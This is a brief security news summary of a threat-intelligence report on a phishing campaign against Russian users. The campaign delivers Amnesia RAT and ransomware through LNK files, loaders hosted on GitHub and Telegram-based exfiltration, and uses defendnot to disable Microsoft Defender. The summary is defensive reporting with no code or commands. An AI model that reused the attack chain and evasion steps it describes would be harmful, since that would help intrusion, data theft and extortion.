A new multi-stage phishing campaign has been observed targeting users in Russia with ransomware and a remote access trojan called Amnesia RAT, according to Fortinet FortiGuard Labs researcher Cara Lin.
The attack begins with social engineering lures delivered via business-themed documents that camouflage malware as routine tasks, with compressed archives containing decoy documents and a malicious LNK file that leads to a first-stage loader hosted on GitHub and ultimately to Amnesia RAT and Hakuna Matata-based ransomware.
The first-stage loader suppresses the PowerShell console, creates a decoy document, and notifies the attacker via Telegram Bot API before a second-stage Visual Basic Script is run; the final payloads include Amnesia RAT, capable of broad data theft, and a ransomware that encrypts various file types after disabling defender components.
The campaign uses multiple public cloud services to distribute payloads and leverages defendnot to disable Microsoft Defender, while later stages perform environment reconnaissance, take screenshots, exfiltrate data over Telegram, and deploy WinLocker to restrict user interaction.
Separately, the report notes deployments linked to UNG0902 and a campaign codenamed Operation DupeHike against Russian entities, with DUPERUNNER and AdaptixC2 beacons, and mentions papers on Paper Werewolf as another actor in recent months.